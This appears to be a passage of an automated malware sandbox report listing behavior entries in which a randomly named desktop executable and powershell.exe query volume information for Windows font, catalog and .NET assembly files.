Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
